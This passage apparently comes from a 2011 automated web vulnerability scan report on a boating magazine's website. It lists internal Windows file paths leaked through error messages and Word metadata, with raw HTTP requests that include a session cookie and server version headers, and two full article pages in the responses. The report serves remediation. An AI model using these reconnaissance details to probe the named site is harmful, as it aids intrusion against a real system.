href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a..
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

6 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

- /service-directory/

/service-directory/

http://www.soundingsonline.com/service-directory/

Identified Internal Path(s)

E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php

Request

GET /service-directory/ HTTP/1.1
Referer: http://www.soundingsonline.com/service-directory/238412-advertising-contact-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:45:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html


<br /><b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />
- /service-directory

/service-directory

http://www.soundingsonline.com/service-directory

Identified Internal Path(s)

E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php

Request

GET /service-directory HTTP/1.1
Referer: http://www.soundingsonline.com/component/content/article/237622
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:45:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html


<br /><b>Fatal error</b>: Maximum execution time of 30 seconds exceeded in <b>E:\Inetpub\SoundingsOnline\libraries\joomla\database\database\mysql.php</b> on line <b>221</b><br />
- /features/profiles/263722-its-a-winner

/features/profiles/263722-its-a-winner

http://www.soundingsonline.com/features/profiles/263722-its-a-winner?tmpl=component&print=1&page=

Identified Internal Path(s)

C:\DOCUME~1\mtrocchi\LOCALS~1\Temp\msohtml1\01

Request

GET /features/profiles/263722-its-a-winner?tmpl=component&print=1&page= HTTP/1.1
Referer: http://www.soundingsonline.com/features/profiles
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr"><head> <base href="http://www.soundingsonline.com/features/profiles/263722-its-a-winner" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex, nofollow" /> <meta name="keywords" content="roger devries" /> <meta name="title" content="It’s a winner" /> <meta name="author" content="Chris Landry" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>It’s a winner</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" /> <link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" /> <link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="Print" /></head><body class="contentpane"> <img src="/templates/soundings1/images/snd_logo_printout.jpg" alt="Soundings" class="printout-logo" /> <div id="page"><!--<h1 class="componentheading profiles_pg"> It’s a winner</h1>--><!----><h2 class="contentheading profiles_pg"> It’s a winner</h2><div class="articleinfo"> <span class="createdate"> Posted on September 01, 2010 </span> <span class="createdby"> Written by Chris Landry </span> <div class="buttonheading"> <a href="#" onclick="window.print();return false;"><img src="/images/M_images/printButton.png" alt="Print" /></a> </div> </div><p><span class="text_subhead"><img class="caption" title="For Army veteran Roger DeVries, happiness is a &quot;new&quot; 36-year-old boat." alt="N26.DEVRIES" src="/images/stories/monthly/09_10/N26.DEVRIES.jpg" width="255" height="170" />A 1974 Sea Ray is modern in every way after winning an extreme makeover contest</span></p>




<p>Roger DeVries had put significant sweat equity into his 1974 Sea Ray, replacing the transom, deck and stringers and installing a new exhaust manifold on the runabout's 155-hp MerCruiser I/O. He had given the boat the foundation for a new life.</p>
<p>"The boat was not in horrible shape," says DeVries, 62, of Wyoming, Mich., who had acquired the bowrider three years earlier. "It was structurally sound by the time I got finished with it."</p>
<p>Even so, the 19-foot SRV 190 was a cosmetic and mechanical nightmare, with outdated wiring and engine and steering controls, dilapidated upholstery and a thoroughly oxidized gelcoat. And the vessel sat on a rust bucket of a trailer that barely made it to the launch ramp. The retired locomotive engineer's boating days with his sons and their families weren't exactly worry-free.</p>
<p>"We had it in the water a couple times last summer, and it was good enough to get out there," says Lisa DeVries, 28, who is married to DeVries' eldest son Nick, 28. But something always needed to be fixed, she recalls.</p>
<p><img class="img_float_right" alt="N26.SEA.RAY" src="/images/stories/monthly/09_10/N26.SEA.RAY.jpg" width="255" height="170" />So when Lisa DeVries heard an announcement on the radio seeking contestants for an extreme boat makeover contest, she thought her father-in-law would have a good shot at winning.</p>
<p>The contest, held by Action Water Sports of Hudsonville, Mich., would award a $10,000 refit to the owner of a boat who was a military veteran or a person with special physical needs. The boat had to be 25 feet or smaller and in working condition.</p>
<p>Lisa DeVries' entry letter explained that Roger DeVries was a Vietnam-era veteran who lacked the time to complete the refit of his Sea Ray because he was constantly helping others. Nicknamed "The Doctor," DeVries has fixed everything for friends and family, including Lisa DeVries' car on more than one occasion. And, she wrote, he was the father of three sons who were currently in the military. One son, Adam, 24, was in Iraq for his second tour, and the two others - Nick and Jeremy, 25 - were scheduled to ship out in spring 2011.</p>
<p>The contest was a close one, with about 40 entrants who could have won. Roger DeVries and his family were selected, but that's just the beginning of the story. In snowballing fashion, marine businesses jumped aboard with Action Water Sports and helped turn the $10,000 refit into a nearly $29,000 overhaul.</p>
<p>"It looks like they stripped that thing down to nothing and rebuilt it," says Roger DeVries, who had traded a 13-foot aluminum boat with a 30-hp Johnson for the Sea Ray. "It looks like a brand-new boat. I'm just delighted."</p>
<p>DeVries didn't know he had won the contest - or even that he was an entrant - until the day his name was called in February at the Grand Rapids (Mich.) Boat Show. The rest of the family had been told just after Christmas, and for nearly two months the DeVries clan kept it a secret.</p>
<p><img class="caption" title="BEFORE: The 19-footer was an excellent candidate for a makeover and the trailer had seen better days as well." alt="N27.BEFORE" src="/images/stories/monthly/09_10/N27.BEFORE.jpg" width="255" height="170" />Luckily, the boat was in storage in a barn at a friend's home, so the family had no problem hauling it to the dealer (other than the threat of the trailer falling apart) so the work could be done. And because it was winter, DeVries had no reason to go to the barn to check on his boat.</p>
<p><img class="caption" title="AFTER: When local marine businesses chipped in, the project became a complete refit, including a new trailer." alt="N27.AFTER" src="/images/stories/monthly/09_10/N27.AFTER.jpg" width="255" height="170" />"There were a couple times when we almost spilled the beans because we just wanted to talk to him about it," says daughter-in-law DeVries. "We kept forgetting it was a secret."</p>
<p>Lisa and Nick DeVries invited friends and family to the boat show to see the made-over Sea Ray - and the father's reaction. In fact, DeVries wondered why he kept bumping into so many friends and acquaintances at the show. "I was just blown away," he says. "I had no idea that they had taken it and they redid just about everything."</p>
<p>The project took on a life of its own when Action Water Sports and Tim Danner from Land 'N' Sea Distributing began calling parts suppliers and asking them to donate products for the cause.</p>
<p>"When I called, I figured I would be talking 15 to 20 minutes to pitch this and end up with a small donation," says Danner, a former MerCruiser certified technician who helped install the engine components. "But two or three minutes into the conversation, they said, 'Yeah, we think this is a great idea. Whatever you need, let us know and we're on board.' It just built momentum."</p>
<p><img class="img_float_right" title="The DeVries clan kept the refit project under wraps until the grand unveiling." alt="N28.DEVRIES.CLAN" src="/images/stories/monthly/09_10/N28.DEVRIES.CLAN.jpg" width="255" height="191" />Coming up with the new trailer was a product of teamwork. "We did not expect to supply a new trailer with this boat," Action Water Sports manager Jerry Brouwer says. "I called Phoenix Trailers and explained it to them. They called their suppliers - the paint supplier, steel, lighting, the tongue jack, the winch. And then suddenly we had a lot of people supporting one cause. We just went to the people in the marine industry that we do business with on a regular basis and asked for help. And they responded - big time."</p>
<table style="width: 274px; height: 821px;" class="article_table" align="right" border="0" cellpadding="0" cellspacing="6">
<tbody>
<tr>
<td>
<p>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ProgId" content="Word.Document" />
<meta name="Generator" content="Microsoft Word 11" />
<meta name="Originator" content="Microsoft Word 11" />
<link rel="File-List" href="file:///C:\DOCUME~1\mtrocchi\LOCALS~1\Temp\msohtml1\01\clip_filelist.xml" />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="156"> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]> <![endif]--><span style="font-size: 10pt;"><span class="text_subhead" style="font-family: Times;">The helping hands that pitched in</span></span></p>
<p><span style="font-size: 12pt; font-family: Times;">
<p><span style="font-size: 10pt;">The work and donated products on Roger DeVries' "new" Sea Ray includes:</span></p>
<ul>
<li><span style="font-size: 10pt;"> Action Water Sports of Hudsonville, Mich., (<a href="http://www.actionwater.com">www.actionwater.com</a>) restored the gelcoat new and installed new electronics, engine components and hardware.</span></li>
<li><span style="font-size: 10pt;"> Nautical Needle of Holland, Mich., (<a href="http://www.thenauticalneedle.us">www.thenauticalneedle.us</a>) took care of the interior, refitting the seats and the gunwale panels with new upholstery. The engine box also was redone, with the Army's insignia sewn into the upholstery. The helm seat was also upholstered with an Army insignia.</span></li>
<li><span style="font-size: 10pt;"> Under the engine box, the distributor, fuel pump, starter and alternator were replaced. The drive received a new water pump, gimbal, U-joints, bellows and shift shaft. All parts were supplied by Sierra (<a href="http://www.sierramarine.com">www.sierramarine.com</a>).</span></li>
<li><span style="font-size: 10pt;"> Teleflex donated a rotary steering system, new engine controls and shift cables, and new gauges (<a href="http://www.teleflexmarine.com">www.teleflexmarine.com</a>).</span></li>
<li><span style="font-size: 10pt;"> From Seachoice (<a href="http://www.seachoice.com">www.seachoice.com</a>) came new cleats, rail fittings, a battery switch, switch panel, breakers, miscellaneous other switches, battery boxes, steering wheel and windshield wiper motors.</span></li>
<li><span style="font-size: 10pt;"> A Humminbird 798c SI chart plotter/fishfinder with side sonar and a battery charger arrived courtesy of Johnson Outdoors (<a href="http://www.johnsonoutdoors.com">www.johnsonoutdoors.com</a>, <a href="http://www.humminbird.com">www.humminbird.com</a>).</span></li>
<li><span style="font-size: 10pt;"> Fusion Electronics (<a href="http://www.fusioncaraudio.com">www.fusioncaraudio.com</a>) gave the boat an iPod-ready stereo and four speakers.</span></li>
<li><span style="font-size: 10pt;"> Johnson Pump supplied bilge and aerator pumps (<a href="http://www.johnson-pump.com">www.johnson-pump.com</a>).</span></li>
<li><span style="font-size: 10pt;"> Norcross Marine (<a href="http://www.norcrossmarine.com">www.norcrossmarine.com</a>) sent a numeric digital depth finder.</span></li>
<li><span style="font-size: 10pt;"> Turning Point Propellers (<a href="http://www.turningpointpropellers.com">www.turningpointpropellers.com</a>) sent a new prop.</span></li>
<li><span style="font-size: 10pt;"> Garelick (<a href="http://www.garelick.com">www.garelick.com</a>) supplied a bracket for an auxiliary motor, a pedestal base for the driver's seat and a swim platform.</span></li>
<li><span style="font-size: 10pt;"> Taylor Marine (<a href="http://www.taylormarine.com">www.taylormarine.com</a>) donated a Bimini top, fenders and an American flag kit.</span></li>
<li><span style="font-size: 10pt;"> A custom trailer was provided by Phoenix Trailers of Ellsworth, Mich., (<a href="http://www.phoenixtrail.com">www.phoenixtrail.com</a>) and many of its parts suppliers.</span></li>
<li><span style="font-size: 10pt;"> New rubrail and deck carpet from MasterCraft (<a href="http://www.mastercraft.com">www.mastercraft.com</a>).</span></li>
<li><span style="font-size: 10pt;"> Murray Lake Marina supplied a surplus distributor and hydraulic ram assembly (<a href="http://www.murraylakemarina.com">www.murraylakemarina.com</a>).</span></li>
<li><span style="font-size: 10pt;"> Land 'N' Sea Distributing (<a href="http://www.landnsea.com">www.landnsea.com</a>) oversaw and distributed the products.</span></li>
</ul>
<br /></span></p>
</td>
</tr>
</tbody>
</table>
<p>Action Water Sports, a dealer for Cobalt, MasterCraft and JC Pontoon, held the contest to generate publicity for the business and to show how boating gets family members together, Brouwer says.</p>
<table class="article_table" align="right" border="0">
</table>
<p>DeVries is a lifetime boater and has enjoyed sailing and powerboating. "I have always liked sailing," he says. "I have had a few sailboats, just daysailers. I grew up on the water with my parents, water skiing and fishing."</p>
<p>Before he went into the Army, DeVries nearly restored a 12-foot wooden Switzer Craft racing boat with a 30-hp Mercury. "When I came home, the boat had dry-rotted from the inside out, so it wound up on a bonfire," he says. "That baby would fly."</p>
<p>The Sea Ray flies faster - about 43 mph, according to its proud owner. "It runs beautifully," DeVries says. "The compression is right up there. The power curve is excellent. I have towed people tubing and wakeboarding, and you can't even tell they're back there. Lately, I've been taking it out probably three or four times a week. I've gotten a lot of compliments on just the look of the boat. I'm real happy."</p>
<p>He'll be even happier when all three sons are home safe. He looks forward to taking them for a boat ride. "Yeah, I'm really looking forward to all of this being done so we can be a family again," he says, "all together again."</p>
<p><em>This article originally appeared in the September 2010 issue.</em></p><div class="yvComment"
id="yvComment263722" >













<div class="CommentClr"></div></div>
</div></body></html>
- /features/technical/259602-outboards-2010

/features/technical/259602-outboards-2010

http://www.soundingsonline.com/features/technical/259602-outboards-2010?tmpl=component&print=1&page=

Identified Internal Path(s)

C:\DOCUME~1\epope\LOCALS~1\Temp\msohtml1\01

Request

GET /features/technical/259602-outboards-2010?tmpl=component&print=1&page= HTTP/1.1
Referer: http://www.soundingsonline.com/features/technical
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr"><head> <base href="http://www.soundingsonline.com/features/technical/259602-outboards-2010" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex, nofollow" /> <meta name="keywords" content="Print magazine July 2010
Outboard engines
" /> <meta name="title" content="Outboards 2010" /> <meta name="author" content="Chris Landry" /> <meta name="description" content="Advances in Weight, Efficiency and Power" /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Outboards 2010</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" /> <link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" /> <link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="Print" /></head><body class="contentpane"> <img src="/templates/soundings1/images/snd_logo_printout.jpg" alt="Soundings" class="printout-logo" /> <div id="page"><!--<h1 class="componentheading technical_pg"> Outboards 2010</h1>--><!----><h2 class="contentheading technical_pg"> Outboards 2010</h2><div class="articleinfo"> <span class="createdate"> Posted on July 01, 2010 </span> <span class="createdby"> Written by Chris Landry </span> <div class="buttonheading"> <a href="#" onclick="window.print();return false;"><img src="/images/M_images/printButton.png" alt="Print" /></a> </div> </div><p><span class="story_subhead">Advances in Weight, Efficiency and Power</span></p>
<p><span class="story_subhead"></span><img src="/images/stories/monthly/07_10/29_Outboard-evolution.jpg" alt="The outboard evolution continues its upward track with advanced technology that offers less weight and better fuel efficiency. This is a Yamaha F250." title="The outboard evolution continues its upward track with advanced technology that offers less weight and better fuel efficiency. This is a Yamaha F250." class="caption" />The production of next-generation 4-stroke outboards keeps zipping along, with manufacturers throttling forward and offering lighter and more fuel-efficient engines. In late 2009, Yamaha launched a lineup of V6 outboards and a new lightweight 3-cylinder 70-hp engine. For 2010, Suzuki focuses on its midrange 4-strokes, with new 40-, 50- and 60-hp engines. And Honda continues the re-engineering it started with its BF90 in 2006, offering an improved, lighter 115-hp engine. That’s not to say the 2-stroke segment has been idle. Evinrude has launched a high-output 15-hp E-TEC and Mercury has four new OptiMax 2-strokes</p>



<p><span class="text_subhead"><br /></span></p>
<p> </p>
<p> </p>
<p> </p>
<p><span class="text_subhead"><img class="img_float_left" src="/images/stories/monthly/07_10/29_Evinrude.jpg" /></span></p>
<p><span class="text_subhead">Evinrude</span><br />At the 2009 Miami International Boat Show, Bombardier Recreational Products announced two new versions of its Evinrude E-TEC 130- and 140-hp outboards. These HO, or high-output, models are engineered with an improved power curve to maximize peak horsepower while maintaining low-end torque, according to BRP.<br />This year BRP introduced an HO 15-hp model. The new engine's Touch-Troll system allows the operator to adjust engine speed up or down in 50-rpm increments. The outboard is available with an adjustable tiller handle or with remote control - both of which incorporate a high-speed tilt component, supported by a heavy-duty bracket, according to BRP spokeswoman Julie Johnson. Like all E-TECs, no maintenance is required for the first three years or 300 hours.<br />Retail pricing for the HO 15-hp engine starts at $3,895. Contact: Evinrude, Waukegan, Ill. Phone: (847) 689-7090. <a target="_blank" href="http://www.evinrude.com">www.evinrude.com</a></p>
<p> </p>
<p><span class="text_subhead"><br /></span></p>
<p> </p>
<p> </p>
<p><span class="text_subhead"><img class="img_float_right" src="/images/stories/monthly/07_10/29_Honda.jpg" /></span></p>
<p><span class="text_subhead">Honda</span><br />Honda's new BF115 is based on the popular Honda Accord automobile engine, sharing the Accord's inline 4-cylinder 2.4-liter DOHC (dual overhead cam) platform. "The BF115 will be able to produce class-leading performance, with unparalleled fuel efficiency and reliability," says Sara Pines, regional manager of Honda Marine public relations. "Plus, the new BF115 will feature design cues similar to its recent predecessors, the BF40 and BF50, BF75 and BF90 and BF105 Jet, including the wing-form design of the cowling and a performance-oriented gearcase."<br />The current BF115, also a 4-cylinder model, weighs 496 pounds - about 100 pounds more than the Yamaha F115. The new Honda's weight, price and other specifications were unavailable at press time. Honda expects to ship the engines to dealers and boat manufacturers around mid-July.<br />Contact: Honda Marine Group, Alpharetta, Ga. Phone: (770) 497-6400. <a target="_blank" href="http://www.honda-marine.com">www.honda-marine.com</a></p>
<p> </p>
<p> </p>
<p><span class="text_subhead"><br /></span></p>
<p> </p>
<p><span class="text_subhead"><img class="img_float_left" src="/images/stories/monthly/07_10/29_Mercury.jpg" /></span></p>
<p><span class="text_subhead">Mercury</span><br />This year Mercury introduces 115-, 125-, 150- and 200-hp OptiMax 2-strokes. The 115 OptiMax Pro XS was designed specifically for boats under 20 feet and pontoon boats 19 feet and larger, says Steve Miller, global brand manager for outboards from 75 to 350 hp.<br />With gasoline prices bound to rise and the economy still shaky, Mercury dealers are seeing more interest in boats between 17 and 19 feet, Miller says. "What we're trying to do is give consumers value in a more economical package," he says. "In an economical boat package, you can still have the performance-enhanced engine that you'll find in our larger [outboards]."<br />Compared to the standard 115-hp OptiMax, the 3-cylinder Pro XS, which weighs in at 375 pounds, delivers more torque, a better hole shot and may increase top-end speed by 2 mph, depending on the application, says Miller.<br />The new 150- and 200-hp engines are also Pro XS models, aimed at the bass boat market.<br />The 125-hp OptiMax is a good fit for deep-vee or pontoon boats, or for repowering an existing boat, when budget is more important than horsepower, says Miller. "We're coming off one of the most brutal recessions in recent history, and people are more cautious than ever about how they spend their disposable income," he says. "We want to make sure we give them options in a price range that appeals to a broader base."<br />The engine has enough "oomph" to adequately power boats with maximum rated horsepower of up to 175, says Miller.<br />Last year Mercury released its Big Tiller for outboards from 75 to 225 hp. "The Big Tiller has been a pretty successful feature for us, and dealers and customers have been asking for it on [the] smaller range of engines," says Miller.<br />Mercury responded, offering the tiller on 40-, 50- and 60-hp 4-strokes. Features of the center-mounted tiller include troll control, LED lighting, forward shift lever, and tiller key switch.<br />All engines are now available. Suggested retail pricing is $9,900 for the 115 Pro XS, $10,175 for the 125 <br />OptiMax, $12,615 for the 150 Pro XS, and $15,595 for the 200 Pro XS. Contact: Mercury Marine, Fond du Lac, Wis. Phone: (920) 929-5040. <a target="_blank" href="http://www.mercurymarine.com">www.mercurymarine.com</a></p>
<p><span class="text_subhead"><br /></span></p>
<p> </p>
<p><span class="text_subhead"><img class="img_float_right" src="/images/stories/monthly/07_10/30_Suzuki.jpg" /></span></p>
<p><span class="text_subhead">Suzuki</span><br />Suzuki this year unveiled 40- and 50-hp engines. "Just because you have a 40 or a 50 doesn't mean you can't have the best motor around," says Suzuki marine marketing director Larry Vandiver.<br />About five years ago, Suzuki promised to introduce a new engine each year, says Vandiver. Last year it came to market with a 60-hp outboard and in 2008 its next-generation 70-, 80- and 90-hp models hit the water.<br />The 40 and 50 consume 23 percent less fuel than their predecessors, according to Suzuki. The company says the new engines also can reach top speeds that are 6 percent higher than the models they are replacing. Acceleration has also been improved.<br />The 40 and 50, which share the same in-line 3-cylinder dual overhead cam engine, have a 57.4-cubic-inch displacement. They use Suzuki's lean-burn control technology, which regulates the fuel-air mixture in these direct-fuel-injected outboards.<br />The manufacturer's new 8- and 9.9-hp models utilize an inline 2-cylinder 12.7-cubic-inch engine, and the shift mechanism is now located on the throttle, rather than the face of the engine, for better access and easier operation. The 9.9-hp is 10 pounds lighter than its predecessor. The DF8, DF9.9 and DF60 are on the market now. The new DF 40/50 should be delivered to dealers in the fall. Retail pricing is as follows: DF8, $2,799; DF9.9, $2,980 to $3,430; DF60, $8,794. Pricing for the DF 40/50 was unavailable at press time. Contact: Suzuki Marine, Brea, Calif., (800) 247-4704. <a target="_blank" href="http://www.suzukimarine.com">www.suzukimarine.com</a></p>
<p><span class="text_subhead"><br /></span></p>
<p> </p>
<p><span class="text_subhead"><img class="img_float_left" src="/images/stories/monthly/07_10/30_YAMAHA.jpg" /></span></p>
<p><span class="text_subhead">Yamaha</span><br />Yamaha in late 2009 introduced nine new models ranging from 60-pound 4- and 6-hp kickers to a 300-hp V6 offshore outboard. The engine manufacturer re-engineered its V6 engine in the 225-, 250- and 300-hp models. It also unveiled the midrange F70, F4 and F6 kickers, and V MAX 4-strokes (200-, 225- and 250-hp models) for inshore coastal boats and freshwater bass boats.<br />All of the engines are touted as lighter, more compact, more fuel-efficient and better performing than previous models. For example, previous 225- and 250-hp models were built using 3.3-liter engines with a displacement of 204.6 cubic inches, while the new versions use 4.2-liter engines with a displacement of 254 cubic inches. The new F225 and F250 weigh 558 pounds. The previous 225 came in at 583 pounds, the 250 at 604 pounds. The new 300-hp V6 replaces the V8 300, which used the same block as the 350-hp engine. The V6 version weighs 246 pounds less and is 17 percent more fuel efficient than the V8 version.<br />In early May, the V MAX, F70 and F4/F6 were already available, and the offshore V6s were on their way to boatbuilders and dealers, says Martin Peters, Yamaha Marine Group communications and dealer education manager.<br />Retail pricing: F300, $24,875 to $25,975; F250, $23,750 to $25,015; F225, $23,125 to $23,865; F70, $8,245; F6, $1,870; F4, $1,565; and for the V MAX SHO (super high output) - VF250, $21,870; VF225, $20,620; VF200, $19,370. Contact: Yamaha Motor Corp., Kennesaw, Ga. Phone: (866) 894-1626. <a target="_blank" href="http://www.yamaha-motor.com">www.yamaha-motor.com</a></p>
<p>See related article:</p>
<p>- <a target="_blank" href="/features/technical/259592-repower-without-regrets">Repower without regrets</a></p>
<p>This article originally appeared in the July 2010 issue.</p>
<p>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ProgId" content="Word.Document" />
<meta name="Generator" content="Microsoft Word 11" />
<meta name="Originator" content="Microsoft Word 11" />
<link rel="File-List" href="file:///C:\DOCUME~1\epope\LOCALS~1\Temp\msohtml1\01\clip_filelist.xml" />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="156"> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]> <![endif]--></p>
<p class="MsoNormal"> </p><div class="yvComment"
id="yvComment259602" >













<div class="CommentClr"></div></div>
</div></body></html>
- /features/technical

/features/technical

http://www.soundingsonline.com/features/technical?start=10

Identified Internal Path(s)

C:\DOCUME~1\epope\LOCALS~1\Temp\msohtml1\01

Request

GET /features/technical?start=10 HTTP/1.1
Referer: http://www.soundingsonline.com/features/technical
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
